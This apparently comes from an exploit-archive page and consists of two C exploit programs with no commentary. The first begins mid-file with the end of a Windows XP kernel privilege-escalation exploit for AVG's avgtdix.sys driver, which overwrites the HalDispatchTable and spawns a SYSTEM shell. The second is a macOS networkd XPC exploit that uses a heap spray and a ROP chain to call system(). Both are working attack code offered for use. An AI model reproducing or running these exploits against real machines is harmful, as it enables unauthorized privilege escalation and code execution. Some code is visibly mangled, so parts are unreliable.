CloseHandle(pi.hThread); CloseHandle(pi.hProcess); } int main(int argc, char *argv[]) { _NtQueryIntervalProfile NtQueryIntervalProfile; LPVOID input[1] = {0}; LPVOID addrtoshell; HANDLE hDevice; DWORD dwRetBytes = 0; DWORD HalDispatchTableTarget; ULONG time = 0; unsigned char devhandle[MAX_PATH]; printf("-------------------------------------------------------------------------------\n"); printf(" AVG Internet Security 2015 (avgtdix.sys) Arbitrary Write EoP Exploit \n"); printf(" Tested on Windows XP SP3 (32bit) \n"); printf("-------------------------------------------------------------------------------\n\n"); if (GetWindowsVersion() == 1) { printf("[i] Running Windows XP\n"); } if (GetWindowsVersion() == 0) { printf("[i] Exploit not supported on this OS\n\n"); return -1; } sprintf(devhandle, "\\\\.\\%s", "avgtdi"); NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile"); if (!NtQueryIntervalProfile) { printf("[-] Unable to resolve NtQueryIntervalProfile\n\n"); return -1; } addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if(addrtoshell == NULL) { printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError()); return -1; } printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell); memset(addrtoshell, 0x90, BUFSIZE); memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp)); printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp)); hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError()); return -1; } else { printf("[+] Open %s device successful\n", devhandle); } HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD); printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget); input[0] = addrtoshell; // input buffer contents gets written to our output buffer address printf("[+] Input buffer contents %08x\n", input[0]); printf("[~] Press any key to send Exploit . . .\n"); getch(); DeviceIoControl(hDevice, 0x830020f8, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); printf("[+] Buffer sent\n"); printf("[+] Spawning SYSTEM Shell\n"); NtQueryIntervalProfile(2, &time); spawnShell(); printf("[+] Restoring Hal dispatch table pointers\n\n"); DeviceIoControl(hDevice, 0x830020f8, restore_pointers_xp, sizeof(restore_pointers_xp)-1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); CloseHandle(hDevice); return 0; } Source

// Requires Lorgnette: https://github.com/rodionovd/liblorgnette // clang -o networkd_exploit networkd_exploit.c liblorgnette/lorgnette.c -framework CoreFoundation // ianbeer #include <dlfcn.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/mman.h> #include <xpc/xpc.h> #include <CoreFoundation/CoreFoundation.h> #include <mach/mach.h> #include <mach/mach_vm.h> #include <mach/task.h> #include <mach-o/dyld_images.h> #include "liblorgnette/lorgnette.h" /* find the base address of CoreFoundation for the ROP gadgets */ void* find_library_load_address(const char* library_name){ kern_return_t err; // get the list of all loaded modules from dyld // the task_info mach API will get the address of the dyld all_image_info struct for the given task // from which we can get the names and load addresses of all modules task_dyld_info_data_t task_dyld_info; mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT; err = task_info(mach_task_self(), TASK_DYLD_INFO, (task_info_t)&task_dyld_info, &count); const struct dyld_all_image_infos* all_image_infos = (const struct dyld_all_image_infos*)task_dyld_info.all_image_info_addr; const struct dyld_image_info* image_infos = all_image_infos->infoArray; for(size_t i = 0; i < all_image_infos->infoArrayCount; i++){ const char* image_name = image_infos[i].imageFilePath; mach_vm_address_t image_load_address = (mach_vm_address_t)image_infos[i].imageLoadAddress; if (strstr(image_name, library_name)){ return (void*)image_load_address; } } return NULL; } struct heap_spray { void* fake_objc_class_ptr; // -------+ uint8_t pad0[0x10]; // | uint64_t first_gadget; // | uint8_t pad1[0x8]; // | uint64_t null0; // | uint64_t pad3; // | uint64_t pop_rdi_rbp_ret; // | uint64_t rdi; // | uint64_t rbp; // | uint64_t system; // | struct fake_objc_class_t { // | char pad[0x10]; // <----------+ void* cache_buckets_ptr; //--------+ uint64_t cache_bucket_mask; // | } fake_objc_class; // | struct fake_cache_bucket_t { // | void* cached_sel; // <--------+ //point to the right selector void* cached_function; // will be RIP } fake_cache_bucket; char command[256]; }; xpc_connection_t connect(){ xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.networkd", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED); xpc_connection_set_event_handler(conn, ^(xpc_object_t event) { xpc_type_t t = xpc_get_type(event); if (t == XPC_TYPE_ERROR){ printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION)); } printf("received an event\n"); }); xpc_connection_resume(conn); return conn; } void go(){ void* heap_spray_target_addr = (void*)0x120202000; struct heap_spray* hs = mmap(heap_spray_target_addr, 0x1000, 3, MAP_ANON|MAP_PRIVATE|MAP_FIXED, 0, 0); memset(hs, 'C', 0x1000); hs->null0 = 0; hs->fake_objc_class_ptr = &hs->fake_objc_class; hs->fake_objc_class.cache_buckets_ptr = &hs->fake_cache_bucket; hs->fake_objc_class.cache_bucket_mask = 0; // nasty hack to find the correct selector address uint8_t* ptr = (uint8_t*)lorgnette_lookup(mach_task_self(), "_dispatch_objc_release"); uint64_t* msgrefs = ptr + 0x1a + (*(int32_t*)(ptr+0x16)); //offset of rip-relative offset of selector uint64_t sel = msgrefs[1]; printf("%p\n", sel); hs->fake_cache_bucket.cached_sel = sel; uint8_t* CoreFoundation_base = find_library_load_address("CoreFoundation"); // pivot: /* push rax add eax, [rax] add [rbx+0x41], bl pop rsp pop r14 pop r15 pop rbp ret */ hs->fake_cache_bucket.cached_function = CoreFoundation_base + 0x46ef0; //0x414142424343; // ROP from here // jump over the NULL then so there's more space: //pop, pop, pop, ret: //and keep stack correctly aligned hs->first_gadget = CoreFoundation_base + 0x46ef7; hs->pop_rdi_rbp_ret = CoreFoundation_base + 0x2226; hs->system = dlsym(RTLD_DEFAULT, "system"); hs->rdi = &hs->command; strcpy(hs->command, "touch /tmp/hello_networkd"); size_t heap_spray_pages = 0x40000; size_t heap_spray_bytes = heap_spray_pages * 0x1000; char* heap_spray_copies = malloc(heap_spray_bytes); for (int i = 0; i < heap_spray_pages; i++){ memcpy(heap_spray_copies+(i*0x1000), hs, 0x1000); } xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0); xpc_dictionary_set_data(msg, "heap_spray", heap_spray_copies, heap_spray_bytes); xpc_dictionary_set_uint64(msg, "type", 6); xpc_dictionary_set_uint64(msg, "connection_id", 1); xpc_object_t params = xpc_dictionary_create(NULL, NULL, 0); xpc_object_t conn_list = xpc_array_create(NULL, 0); xpc_object_t arr_dict = xpc_dictionary_create(NULL, NULL, 0); xpc_dictionary_set_string(arr_dict, "hostname", "example.com"); xpc_array_append_value(conn_list, arr_dict); xpc_dictionary_set_value(params, "connection_entry_list", conn_list); char* long_key = malloc(1024); memset(long_key, 'A', 1023); long_key[1023] = '\x00'; xpc_dictionary_set_string(params, long_key, "something or other that's not important"); uint64_t uuid[] = {0, 0x120200000}; xpc_dictionary_set_uuid(params, "effective_audit_token", (const unsigned char*)uuid); xpc_dictionary_set_uint64(params, "start", 0); xpc_dictionary_set_uint64(params, "duration", 0); xpc_dictionary_set_value(msg, "parameters", params); xpc_object_t state = xpc_dictionary_create(NULL, NULL, 0); xpc_dictionary_set_int64(state, "power_slot", 0); xpc_dictionary_set_value(msg, "state", state); xpc_object_t conn = connect(); printf("connected\n"); xpc_connection_send_message(conn, msg); printf("enqueued message\n"); xpc_connection_send_barrier(conn, ^{printf("other side has enqueued this message\n");}); xpc_release(msg); } int main(){ go(); printf("entering CFRunLoop\n"); for({ CFRunLoopRunInMode(kCFRunLoopDefaultMode, DBL_MAX, TRUE); } return 0; } Source